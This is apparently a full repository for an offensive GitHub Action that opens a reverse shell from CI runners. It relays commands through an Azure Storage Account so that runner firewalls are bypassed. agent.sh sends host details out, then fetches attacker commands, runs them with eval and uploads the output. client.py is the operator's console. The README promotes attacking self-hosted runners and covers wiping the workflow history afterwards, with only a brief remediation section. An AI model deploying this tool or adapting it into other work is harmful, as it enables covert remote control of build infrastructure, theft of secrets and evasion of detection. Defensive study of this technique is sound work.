├── README.md ├── action.yml ├── agent.sh ├── client.py └── resources ├── demo.png ├── diagram.png └── logo.jpg /README.md: -------------------------------------------------------------------------------- 1 | # Azure Storage Account Reverse Shell 2 | 3 | ![Logo](resources/logo.jpg) 4 | 5 | ## 🏁 What this is and major use cases 6 | 7 | This is a GitHub Action that can send a reverse shell from a GitHub runner to any internet connected device able to run python, utilizing Azure Storage Account as a broker - bypassing firewall rules in place on self-hosted runners. 8 | 9 | This comes in handy in two cases: 10 | 11 | 1. 🐱‍👤 **Red Team Exercise:** 12 | * All outgoing and "incoming" connections from the runner are made to `*.blob.core.windows.net`, so a high level of scrutiny is needed to detect this. 13 | * However, you might want to not use this action directly, but adapt the code into your own ;) 14 | 3. 💻 **Attacking self-hosted runners:** 15 | * Self-hosted runners should be hardened and not allow any outgoing connections other than the minimum required by the GitHub documentation. 16 | * The endpoint `*.blob.core.windows.net` has to be whitelisted even for firewall protected self-hosted runners, since GitHub uses Azure Storage Accounts for writing job summaries, logs, workflow artifacts, and caches (see [documentation](https://docs.github.com/en/actions/hosting-your-own-runners/managing-self-hosted-runners/about-self-hosted-runners#communication-between-self-hosted-runners-and-github)). 17 | * This is especially interesting for non-ephemeral runners, if you want to debug other workflow runs, too. 18 | 19 | And this is what an incoming shell looks like: 20 | 21 | ![demo](resources/demo.png) 22 | 23 | ## How to use it 24 | 25 | ### Set up the Azure Storage Account 26 | 27 | This is straightforward, you will need a resource group, open a Storage Account within it and then open a container within that one. Note down the names of the last two: 28 | 29 | ``` bash 30 | az group create \ 31 | --name \ 32 | --location 33 | 34 | az storage account create \ 35 | --resource-group \ 36 | --name \ 37 | --location \ 38 | --sku Standard_LRS 39 | 40 | az storage container create \ 41 | --resource-group \ 42 | --account-name 43 | --name 44 | ``` 45 | 46 | Now generate a SAS token that will allow for listing, reading, writing and deleting blobs for a limited time. This command will generate one that is valid for 30 minutes: 47 | 48 | ``` bash 49 | az storage container generate-sas \ 50 | --account-name \ 51 | --name \ 52 | --permissions lrdw \ 53 | --expiry $(date -u -d "+30 minutes" +"%Y-%m-%dT%H:%M:%SZ") 54 | ``` 55 | 56 | ### Set up your client 57 | 58 | > 💡 It is currently important to start the script before you trigger the reverse shell, since the script will only utilize the first incoming session after it started. 59 | 60 | Set the values for the Storage Account, the container and the SAS token as environment variables: 61 | 62 | ``` bash 63 | export AZ_STORAGE_ACCOUNT_NAME= 64 | export AZ_STORAGE_CONTAINER_NAME= 65 | export AZ_STORAGE_SAS_TOKEN= 66 | ``` 67 | 68 | Then run the client - it will query the Storage Account for an incoming shell every second: 69 | 70 | ``` bash 71 | python3 client.py 72 | ``` 73 | 74 | ### Set up (and trigger) the reverse shell 75 | 76 | Include the following in your target repo into `.github/worflows/.yml` - the example is being triggered by `workflow_dispatch`, but use `push` or whatever fits the bill. 77 | 78 | ``` yml 79 | on: 80 | 81 | 82 | jobs: 83 | exfil: 84 | runs-on: ubuntu-latest 85 | name: This will send a reverse shell via Azure Storage Account 86 | steps: 87 | - uses: offensive-actions/azure-storage-reverse-shell@ 88 | with: 89 | az-storage-account-name: '' 90 | az-storage-container-name: '' 91 | az-storage-sas-token: '' 92 | ``` 93 | 94 | ### When you are done 95 | 96 | **Ending the session from the agent's side:** per default, the reverse shell times out after 2 minutes of inactivity. This behaviour can be influenced by setting the `retry-interval` (default: `2` seconds) and the `max-retries` (default: `60`) when creating the `.github/worflows/.yml`. 97 | 98 | **Ending the session from the client's side:** Just type `exit` - the script will let the agent know and then terminate. 99 | 100 | **Invalidate credentials:** You ~~can~~ should rotate the Storage Account keys to invalidate the SAS tokens generated earlier: 101 | 102 | ``` bash 103 | az storage account keys renew \ 104 | --account-name \ 105 | --key key1 106 | 107 | az storage account keys renew \ 108 | --account-name \ 109 | --key key2 110 | ``` 111 | 112 | **Housekeeping:** If needed: 113 | 114 | * purge the GitHub Action history 115 | * delete the workflow definition from the target repository 116 | * delete the container, Storage Account and resource group 117 | 118 | ## How it works 119 | 120 | * When the GitHub Action is executed on the target runner, it gathers intelligence about the context it is running in and puts it into a prompt format: `whoami@hostname:pwd$`. 121 | * Then, it will write this to a blob in an Azure Storage Account, using the current unix timestamp as a prefix. 122 | * On the attacker's side, a client script regularly polls for new blobs - and as soon as it finds one, it will load it and output the contents in the form of a terminal prompt. 123 | * Then, every command written to this prompt will be written to a new blob in the Storage Account, using again the same unix timestamp as prefix. 124 | * On the runner, the Action also polls for new blobs, loads their content (the commands from the client script), and writes the results back to the Storage Account. 125 | * The client, pulling for new blobs, will receive this and output the result. 126 | 127 | ![diagram](resources/diagram.png) 128 | 129 | > ❗ This reverse shell is, due to it's nature, not fully interactive. Thus, you will lose the shell if you send a command that requires interactive input. 130 | > An example would be: if you send `sudo -l`, and a password is needed, you cannot enter it. 131 | > Currently, this bricks the Action run and dependent on the runner in use, the process will live a long time. 132 | 133 | ## Why I do this 134 | 135 | 1. Because it's fun. 136 | 2. To learn stuff (see point 1). 137 | 3. Because I hope you might find this fun, too, and reach out with pull requests or comments, feauture requests, etc. 138 | 139 | ## Remediation 140 | 141 | > This is not an endorsement or sponsored, I just now learned about this in a discussion on Linkedin with the co-founder of [StepSecurity](https://www.stepsecurity.io/) and this deserves some credit 💯. 142 | 143 | When the job run starts, one can actually detect which Storage Account will be used for caching. Then, all egress traffic to other Storage Accounts can be blocked. 144 | There are different tools out there to harden GitHub-hosted and self-hosted runners, several of these might already include this function. 145 | 146 | Here is an example of a malicious workflow run that was stopped: [https://github.com/step-security/github-actions-goat/actions/runs/11038173335/workflow](https://github.com/step-security/github-actions-goat/actions/runs/11038173335/workflow), make sure to check the build logs! 147 | 148 | ## Currently next planned steps 149 | 150 | 1. If timeout hits on the side of GitHub, the agent should send that information to the storage account, and the client should pick up on it. 151 | 2. The client should list all currently available shells instead of just showing the first one that is incoming after client start. 152 | 3. The agent should implement a timeout for commands that are executed, in case e.g. an interactive command has accidentaly been sent. If the timeout is hit, the agent should communicate that and resume operations. 153 | 4. The whole interaction should get logged into a file for compliance. 154 | 5. Check for windows and macOS runners, currently it's untested there. 155 | -------------------------------------------------------------------------------- /action.yml: -------------------------------------------------------------------------------- 1 | name: 'Reverse Shell' 2 | description: 'This sends a reverse shell via Azure Storage Account to circumvent hardened firewall rules for self-hosted runners.' 3 | 4 | inputs: 5 | az-storage-account-name: 6 | description: 'The Azure Storage Account to send data to' 7 | required: true 8 | az-storage-container-name: 9 | description: 'The name of the Azure Storage Account container to send data to' 10 | required: true 11 | az-storage-sas-token: 12 | description: 'The SAS token for the Azure Storage Account container' 13 | required: true 14 | retry-interval: 15 | description: 'How often the action pulls for new commands in the storage account in seconds' 16 | required: false 17 | default: 2 18 | max-retries: 19 | description: 'How many times the action will check for new commands in the storage account before terminating the reverse shell' 20 | required: false 21 | default: 60 22 | 23 | runs: 24 | using: "composite" 25 | steps: 26 | - name: 'Setup reverse shell via Azure Storage Account container' 27 | shell: bash 28 | run: bash ${{ github.action_path }}/agent.sh 29 | env: 30 | AZ_STORAGE_ACCOUNT_NAME: ${{ inputs.az-storage-account-name }} 31 | AZ_STORAGE_CONTAINER_NAME: ${{ inputs.az-storage-container-name }} 32 | AZ_STORAGE_SAS_TOKEN: ${{ inputs.az-storage-sas-token }} 33 | RETRY_INTERVAL: ${{ inputs.retry-interval }} 34 | MAX_RETRIES: ${{ inputs.max-retries }} 35 | -------------------------------------------------------------------------------- /agent.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # Define variables, here set via action.yml 4 | #AZ_STORAGE_ACCOUNT_NAME="" # Replace with your storage account name 5 | #AZ_STORAGE_CONTAINER_NAME="" # Replace with your container name 6 | #AZ_STORAGE_SAS_TOKEN="" # Replace with your sas token 7 | #RETRY_INTERVAL=2 # Time in seconds between retries 8 | #MAX_RETRIES=60 # Maximal retries without finding a new command to execute 9 | 10 | # Save the current time in Unix format 11 | UNIX_TIMESTAMP=$(date +%s) 12 | 13 | # Function to download a blob 14 | download_blob() { 15 | local blob_url="https://${AZ_STORAGE_ACCOUNT_NAME}.blob.core.windows.net/${AZ_STORAGE_CONTAINER_NAME}/${COMMAND_BLOB_NAME}?${AZ_STORAGE_SAS_TOKEN}" 16 | curl -s -o "command.txt" "$blob_url" 17 | } 18 | 19 | # Function to upload a blob 20 | upload_blob() { 21 | local blob_url="https://${AZ_STORAGE_ACCOUNT_NAME}.blob.core.windows.net/${AZ_STORAGE_CONTAINER_NAME}/${RESULT_BLOB_NAME}?${AZ_STORAGE_SAS_TOKEN}" 22 | curl -s -X PUT \ 23 | -H "x-ms-blob-type: BlockBlob" \ 24 | -d "$(cat result.txt)" \ 25 | "$blob_url" 26 | } 27 | 28 | # Function to get the latest counter for a given timestamp 29 | get_latest_counter() { 30 | local timestamp=$1 31 | local latest_counter=0 32 | local blob_prefix="${timestamp}-" 33 | local blob_suffix="-command" 34 | 35 | # List all blobs with the prefix and suffix 36 | blob_list=$(curl -s "https://${AZ_STORAGE_ACCOUNT_NAME}.blob.core.windows.net/${AZ_STORAGE_CONTAINER_NAME}?restype=container&comp=list&${AZ_STORAGE_SAS_TOKEN}" | grep -oP "(?<=).*?(?=)") 37 | 38 | for blob in $blob_list; do 39 | if [[ $blob == ${blob_prefix}* && $blob == *${blob_suffix} ]]; then 40 | counter=$(echo "$blob" | cut -d'-' -f2) 41 | if [[ $counter =~ ^[0-9]+$ ]] && (( $counter > $latest_counter )); then 42 | latest_counter=$counter 43 | fi 44 | fi 45 | done 46 | 47 | echo $latest_counter 48 | } 49 | 50 | # Step 1: Save the initial result to a blob with counter 0 51 | RESULT_BLOB_NAME="${UNIX_TIMESTAMP}-0-result" 52 | echo "$(whoami)@$(hostname):~$(pwd)$ " > result.txt 53 | upload_blob 54 | 55 | # Initialize the last processed counter 56 | LAST_PROCESSED_COUNTER=0 57 | 58 | # Monitor for and process new commands 59 | while : ; do 60 | # Get the latest counter for the current timestamp 61 | LATEST_COUNTER=$(get_latest_counter "$UNIX_TIMESTAMP") 62 | 63 | # Check if there is a new blob to process 64 | if [ "$LATEST_COUNTER" -gt "$LAST_PROCESSED_COUNTER" ]; then 65 | 66 | ATTEMPT=0 67 | COMMAND_BLOB_NAME="${UNIX_TIMESTAMP}-${LATEST_COUNTER}-command" 68 | RESULT_BLOB_NAME="${UNIX_TIMESTAMP}-${LATEST_COUNTER}-result" 69 | 70 | # Get the blob, read the command and execute it. stop shell if "exit" is received. 71 | download_blob 72 | COMMAND=$(cat command.txt) 73 | if [ "$COMMAND" = "exit" ]; then 74 | exit 0 75 | else 76 | RESULT=$(eval "$COMMAND") 77 | fi 78 | 79 | # Write the result back to the storage account 80 | echo "$RESULT" > result.txt 81 | upload_blob 82 | 83 | # Clean up 84 | rm command.txt result.txt 85 | 86 | # Update the last processed counter 87 | LAST_PROCESSED_COUNTER=$LATEST_COUNTER 88 | else 89 | # Count tries without new commands and stop trying after given retries 90 | ATTEMPT=$((ATTEMPT + 1)) 91 | if [ "$ATTEMPT" -eq "$MAX_RETRIES" ]; then 92 | exit 0 93 | fi 94 | fi 95 | 96 | # Wait before checking again 97 | sleep "$RETRY_INTERVAL" 98 | done 99 | -------------------------------------------------------------------------------- /client.py: -------------------------------------------------------------------------------- 1 | import os 2 | import requests 3 | import time 4 | import re 5 | import sys 6 | 7 | # ANSI escape codes for colors 8 | BLUE = '\033[34m' 9 | GREEN = '\033[32m' 10 | RESET = '\033[0m' 11 | 12 | def get_env_or_prompt(var_name, prompt_message): 13 | """ 14 | Retrieve environment variable or prompt user for the value if not set. 15 | """ 16 | value = os.getenv(var_name) 17 | if value is None: 18 | value = input(prompt_message) 19 | if not value: 20 | raise ValueError(f"The value for {var_name} cannot be empty.") 21 | return value 22 | 23 | def initialize_azure_storage_credentials(): 24 | """ 25 | Initialize Azure Storage credentials either from environment variables or user input. 26 | """ 27 | global account_name, container_name, sas_token 28 | 29 | account_name = get_env_or_prompt('AZ_STORAGE_ACCOUNT_NAME', 'Enter Azure Storage Account Name: ') 30 | container_name = get_env_or_prompt('AZ_STORAGE_CONTAINER_NAME', 'Enter Azure Storage Container Name: ') 31 | sas_token = get_env_or_prompt('AZ_STORAGE_SAS_TOKEN', 'Enter Azure Storage SAS Token: ') 32 | 33 | def list_blobs(): 34 | """ 35 | List all blob names in the container. 36 | """ 37 | list_blobs_url = f"https://{account_name}.blob.core.windows.net/{container_name}?restype=container&comp=list&{sas_token}" 38 | 39 | try: 40 | response = requests.get(list_blobs_url) 41 | response.raise_for_status() 42 | blobs = re.findall(r'([^<]+)', response.text) 43 | return blobs 44 | except requests.RequestException as e: 45 | raise Exception(f"An error occurred while listing blobs: {e}") 46 | 47 | def monitor_for_new_connection(start_blobs): 48 | """ 49 | Monitor the container for a new blob that matches the naming schema and indicates a new incoming connection. 50 | """ 51 | known_blobs = set(start_blobs) 52 | 53 | while True: 54 | blobs = list_blobs() 55 | new_blobs = set(blobs) - known_blobs 56 | if new_blobs: 57 | for blob in new_blobs: 58 | match = re.match(r'^(\d+)-0-result$', blob) 59 | if match: 60 | timestamp = match.group(1) 61 | print(f"\nIncoming connection with timestamp: {timestamp}.") 62 | return timestamp 63 | 64 | # Print "." on the same line to indicate waiting 65 | sys.stdout.write(".") 66 | sys.stdout.flush() 67 | time.sleep(1) 68 | 69 | def get_blob_contents(blob_name): 70 | """ 71 | Download the contents of the blob with the given timestamp and suffix. 72 | """ 73 | blob_url = f"https://{account_name}.blob.core.windows.net/{container_name}/{blob_name}?{sas_token}" 74 | 75 | try: 76 | response = requests.get(blob_url) 77 | response.raise_for_status() 78 | return response.text.strip() 79 | except requests.RequestException as e: 80 | raise Exception(f"An error occurred while fetching the blob {blob_name}: {e}") 81 | 82 | def upload_blob(content, blob_name): 83 | """ 84 | Upload the content to a new blob with the given timestamp and suffix. 85 | """ 86 | blob_url = f"https://{account_name}.blob.core.windows.net/{container_name}/{blob_name}?{sas_token}" 87 | 88 | headers = { 89 | "x-ms-blob-type": "BlockBlob" 90 | } 91 | 92 | try: 93 | response = requests.put(blob_url, headers=headers, data=content) 94 | response.raise_for_status() 95 | except requests.RequestException as e: 96 | raise Exception(f"An error occurred while uploading the blob {blob_name}: {e}") 97 | 98 | def get_prompt(): 99 | """ 100 | Get the prompt from the blob and apply color formatting. 101 | """ 102 | # Get the prompt from the blob 103 | prompt_blob = f"{connection_start_timestamp}-0-result" 104 | prompt_format = get_blob_contents(prompt_blob) 105 | 106 | # Add color formatting 107 | try: 108 | # Assuming the format is something like "@:~$" 109 | user_and_host, rest_of_prompt = prompt_format.split(':~', 1) 110 | working_directory = rest_of_prompt 111 | 112 | prompt = ( 113 | f"{BLUE}{user_and_host}{RESET}:~" 114 | f"{GREEN}{working_directory}{RESET} " 115 | ) 116 | except ValueError: 117 | # If the format doesn't match, fallback to no color formatting 118 | prompt = prompt_format 119 | 120 | return prompt 121 | 122 | def main(): 123 | global connection_start_timestamp 124 | global connection_prompt 125 | 126 | initialize_azure_storage_credentials() 127 | 128 | # Initial retrieval of blobs 129 | start_blobs = list_blobs() 130 | 131 | # Monitor for new blob and get the timestamp 132 | connection_start_timestamp = monitor_for_new_connection(start_blobs) 133 | 134 | # Compute the prompt once 135 | connection_prompt = get_prompt() 136 | 137 | # Initialize command number 138 | command_number = 1 139 | 140 | while True: 141 | 142 | # Display the prompt 143 | user_input = input(connection_prompt) 144 | 145 | # Upload the command blob 146 | command_blob_name = f"{connection_start_timestamp}-{command_number}-command" 147 | upload_blob(user_input, command_blob_name) 148 | 149 | # Handle exit command 150 | if user_input.strip().lower() == 'exit': 151 | break 152 | 153 | # Monitor for result blob 154 | while True: 155 | result_blob_name = f"{connection_start_timestamp}-{command_number}-result" 156 | blobs = list_blobs() 157 | if result_blob_name in blobs: 158 | result_content = get_blob_contents(result_blob_name) 159 | print(result_content, end='\n\n') 160 | break 161 | 162 | # Increment command number for the next command 163 | command_number += 1 164 | 165 | print("Exiting...") 166 | 167 | if __name__ == "__main__": 168 | main() 169 | -------------------------------------------------------------------------------- /resources/demo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/offensive-actions/azure-storage-reverse-shell/555520241eb24889e9e35280c666246151496769/resources/demo.png -------------------------------------------------------------------------------- /resources/diagram.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/offensive-actions/azure-storage-reverse-shell/555520241eb24889e9e35280c666246151496769/resources/diagram.png -------------------------------------------------------------------------------- /resources/logo.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/offensive-actions/azure-storage-reverse-shell/555520241eb24889e9e35280c666246151496769/resources/logo.jpg --------------------------------------------------------------------------------